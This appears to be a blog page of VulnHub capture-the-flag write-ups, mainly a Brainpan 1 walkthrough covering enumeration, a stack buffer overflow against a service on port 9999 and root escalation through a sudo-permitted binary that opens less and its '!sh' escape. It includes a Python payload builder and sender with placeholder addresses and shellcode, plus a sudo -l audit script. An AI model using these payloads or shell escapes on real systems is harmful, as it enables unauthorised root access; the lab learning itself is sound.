#pwned vulnhub
Pwned Vulnhub Walkthrough
The Pwned VulnHub challenge is an easy boot2root machine. One of the key takeaways from this machine is how you can escalate your privileges using Docker. This blog post is about how I exploited this machine and what different tools I used to make that happen. Below are the requirements: You can get the virtual machine from here: https://www.vulnhub.com/entry/pwned-1,507/ I used Kali as a…

Brainpan 1
Over the last couple of weeks I have been working on Brainpan, the first in a series downloadable on VulnHub. It usually receives a difficulty rating of intermediate, a bit easier than I like to go for, but it's recommended by many as an ideal series for both OSCP prep and getting to grips with executing buffer overflow attacks. It's definitely not a challenging machine: you really only need knowledge of directory enumeration and port scanning to discover the binary you need to crack, and the binary itself takes very little effort to pwn (the function containing the two needed gadgets is actually hinted at). After delivering the buffer overflow attack remotely to Brainpan and opening a backdoor to the VM (reverse shell or bind shell), you're greeted with the final challenge of privilege escalation; in the case of Brainpan 1 this is not a difficult process if you're familiar with what to look for.

All in all it's a short and sweet challenge and I did learn more about buffer overflow (as this was my second experience with it). I even pwned myself locally using a different method of attack I believe is referred to as Ret2Kernel32 (a similar concept to Ret2Libc); I have the code for this but it's pretty much useless as the physical addresses didn't match up. I will now describe the process of rooting Brainpan 1, in addition to an explanation of my local exploit. I will be focusing on buffer overflow for the next few months as I'm still at script kiddie level and I would have taken longer to root Brainpan without the 'winkwink' hint.
Information Gathering
This shows us that there are only two public-facing services on Brainpan: a web server listening for HTTP traffic on port 10000 and a service on port 9999 that Nmap identifies as Abyss. The information and the vulnerability we need to exploit are evidently present on these two services. Upon visiting port 10000 through HTTP, you're greeted with a simple image; nothing really to check manually here. Visiting port 9999 reveals Brainpan in ASCII art with ACCESS DENIED already present. Port 9999 can also be accessed via Telnet or a raw TCP client (e.g. Netcat). Now the best way to proceed from this point would have been to run a Nikto scan on the SimpleHTTPServer; I instead proceeded to run DirBuster, which revealed the presence of the 'bin' directory and a file named brainpan.exe (still working on my organisation, don't judge. xD)
Exploit Development and Opening Backdoor
strings -a -t x brainpan.exe
Shitstorm was the intended password, leading to ACCESS GRANTED; the process exits after generating this output, so I didn't think using it was of any relevance.
objdump -D brainpan.exe
I decided to manually fuzz the exe through Winedbg (though I think I'll be using a tool for this in the future), which revealed that the binary crashes after the buffer is filled with 520 bytes. I spent the majority of my time cracking the binary: I cracked it locally relatively quickly, as I've done a ret2libc attack before and was already familiar with those sorts of methods; I made the mistake of assuming the dll.so would have the same physical addresses on both machines (or that the kernel32.dll.so was even the same...). Finally, after some trial and error, I came to the conclusion that using the gadgets within 'winkwink' would probably place my shellcode at an executable location on the stack (because of the name, for one; the second gadget caught my eye due to the 'pop ebp ; ret' instruction).
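The following is an added example, not the post's own exploit: it shows the mechanical part of the job done with a small tool rather than by hand, which is what the post says it should have used. It generates a cyclic pattern so the bytes that land in EIP at the crash identify the exact overwrite offset, checks shellcode for bad characters, and lays out the classic payload of filler, return address, NOP sled and shellcode for a gadget that returns into ESP (the post's own layout, with the shellcode stored inside the buffer and a 'pop ebp ; ret' gadget, differs). The crash value, the return address 0x41424344, the shellcode bytes and the host/port are constructed placeholders; read the real ones from winedbg and objdump.

```python
"""Added example (not the original post's exploit code): offset discovery
and payload layout for a stack overflow in a service like brainpan.exe.

CONSTRUCTED placeholders, not values from Brainpan: the crash value in
main(), the return address, the shellcode bytes and the host/port."""
import itertools
import socket
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
    for the first 20280 bytes, so the value in EIP maps to one offset."""
    out = bytearray()
    for a, b, c in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase, string.digits):
        out += (a + b + c).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """EIP shows 4 pattern bytes as a little-endian int; the index of those
    bytes in the pattern is the number of bytes before the saved EIP."""
    idx = pattern.find(struct.pack("<I", eip_value))
    if idx < 0:
        raise ValueError("EIP value not in pattern; send a longer pattern")
    return idx


def bad_chars(shellcode: bytes, bad: bytes = b"\x00\x0a\x0d") -> set:
    """Bytes that would truncate or mangle the input (NUL, LF, CR for a
    line-oriented service); shellcode must be encoded to avoid them."""
    return {b for b in bad if b in shellcode}


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  sled: int = 16) -> bytes:
    """filler up to EIP, the overwritten return address, then the NOP sled
    and shellcode, which is what ESP points at once the function returns."""
    found = bad_chars(shellcode)
    if found:
        raise ValueError(f"shellcode contains bad chars: {sorted(found)}")
    return (b"A" * offset
            + struct.pack("<I", ret_addr)   # little-endian for x86
            + b"\x90" * sled
            + shellcode)


def send_to_service(host: str, port: int, data: bytes,
                    timeout: float = 5.0) -> bytes:
    """Deliver the buffer to the listening service and return its banner.
    The trailing newline assumes a line-oriented read; adjust if needed."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(4096)
        s.sendall(data + b"\n")
        return banner


if __name__ == "__main__":
    pattern = cyclic_pattern(1000)
    # CONSTRUCTED crash: pretend the debugger showed pattern[524:528] in EIP.
    fake_eip = struct.unpack("<I", pattern[524:528])[0]
    off = pattern_offset(pattern, fake_eip)
    print(f"EIP={fake_eip:#010x} -> offset {off}")
    # CONSTRUCTED placeholders: a gadget address and an int3 stub.
    payload = build_payload(off, 0x41424344, b"\xcc" * 4)
    print(f"payload is {len(payload)} bytes; "
          f"send_to_service(host, 9999, payload) delivers it")
```

In practice you send the pattern once, read EIP in the debugger, and feed that value to pattern_offset; the payload is then rebuilt with the real gadget address and encoded shellcode before it is sent to port 9999.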
Privilege Escalation
With our backdoor open we can now proceed to escalate our privileges. This is not a difficult process in the case of Brainpan if you're aware of what to look for. A simple
sudo -l
will reveal an exploitable oversight present within the system:
sudo -l shows that anansi_util may be run through sudo as root (it is sudo, not the SetUID bit, that grants this: the binary runs with root's user ID because root is the permitted run-as user). We just need to discover whether the binary calls any utility that will let us execute a shell as root. A brief test of the three possible arguments to the binary reveals that one of them invokes less; less lets you run a shell command with '!', so '!sh' opens /bin/sh as a child process, and because the parent is already root via sudo, the child is root too. Thus !sh should give us a root shell (this only works because nothing restricts the pager: sudo's NOEXEC tag or a pager started with LESSSECURE=1 would block the escape):
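As an added example (not part of the original post), the following script audits sudo -l output for exactly this pattern: a command permitted as root that hands control to a program with a shell escape, and the sudo-side tag that blocks it. The sudo -l text is constructed sample output in sudo's usual format, not the real Brainpan output; only the name anansi_util comes from the post, and the paths are placeholders.

```python
"""Added example, not from the original post: classify `sudo -l` entries
by how they could yield a root shell.

SAMPLE_SUDO_L is CONSTRUCTED in sudo's output format; it is not Brainpan's
real output and the paths are placeholders."""
import os
import re
from typing import List, NamedTuple

SAMPLE_SUDO_L = """\
Matching Defaults entries for anansi on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User anansi may run the following commands on this host:
    (root) NOPASSWD: /usr/local/bin/anansi_util
    (root) NOEXEC: /usr/bin/less
    (ALL : ALL) NOPASSWD: /usr/bin/man
    (www-data) /usr/bin/vim
"""

# Programs that can run a shell from inside themselves (GTFOBins-style list).
SHELL_ESCAPERS = {"less", "more", "man", "vi", "vim", "nano", "ftp", "gdb",
                  "python", "python3", "perl", "awk", "find", "env", "bash", "sh"}

# "(runas) TAG: TAG: command" ; tags like NOPASSWD:, NOEXEC:, SETENV: are optional
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(.+?)\s*$")


class SudoEntry(NamedTuple):
    runas: str      # user the command runs as ("root", "ALL", ...)
    tags: tuple     # e.g. ("NOPASSWD",) or ("NOEXEC",)
    command: str    # permitted command line, or "ALL"


def parse_sudo_l(text: str) -> List[SudoEntry]:
    """Parse the '(runas) TAG: command' lines after 'User X may run ...'."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m:
            runas = m.group(1).split(":")[0].strip()   # "(root : root)" -> root
            tags = tuple(t.rstrip(":") for t in m.group(2).split())
            entries.append(SudoEntry(runas, tags, m.group(3)))
    return entries


def classify(entry: SudoEntry) -> str:
    """How the entry could give a root shell:
    not-root      runs as an unprivileged user, no escalation to root
    full-root     ALL as root
    noexec        sudo's NOEXEC tag blocks the execve behind '!sh'
    shell-escape  the program itself can spawn a shell
    review        custom binary: run each argument and watch what it calls
                  (the walkthrough found less behind one of them)"""
    if entry.runas not in ("root", "ALL"):
        return "not-root"
    if entry.command == "ALL":
        return "full-root"
    if "NOEXEC" in entry.tags:
        return "noexec"
    prog = os.path.basename(entry.command.split()[0])
    if prog in SHELL_ESCAPERS:
        return "shell-escape"
    return "review"


def audit(text: str) -> List[tuple]:
    """(command, classification) for every entry that runs as root."""
    return [(e.command, classify(e)) for e in parse_sudo_l(text)
            if classify(e) != "not-root"]


if __name__ == "__main__":
    for cmd, verdict in audit(SAMPLE_SUDO_L):
        print(f"{verdict:13} {cmd}")
```

A "review" verdict is where the manual step from the walkthrough comes in: run the wrapper with each argument it accepts and see whether it drops you into a pager or editor; if it does and the entry carries no NOEXEC tag, '!sh' inside that pager is a root shell.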
From here, I simply changed root's password and logged in via su.
My Local Exploit
The below worked on my version of Kali Linux when the exe is executed through Wine:
Conclusion
So, Brainpan was definitely a useful experience for me: it was my first exposure to an x86 Windows binary, as my first B/O was ELF x86_64, and I've never escalated my privileges through less before. I would definitely recommend rooting it if you're new to buffer overflows and your intention is to develop your knowledge of B/Os. I'll be doing more buffer overflow challenges as I would have liked to develop the exploit based on knowledge rather than trial and error: I've since looked at other walkthroughs for Brainpan and my exploit is different, as I believed it was more practical to store the NOP sled and shellcode within the buffer (as the value is being used in strcmp it shouldn't logically be overwritten until after our exploit has executed) and then to pop this value to the stack. There are also many tools I didn't use (e.g. ROPgadget) that may have inspired me if I hadn't forgotten about them, and I want to improve my speed with these attacks.
Kioptrix 1.1 #3 OWNED. #vulnhub #ctf #kalilinux #hacking #hackers #infosec #wargames #pwned Third machine in the Kioptrix series. Below I leave you the exploitation guide, I hope you like it! 😀 Kioptrix 1.1 #3 Walkthrough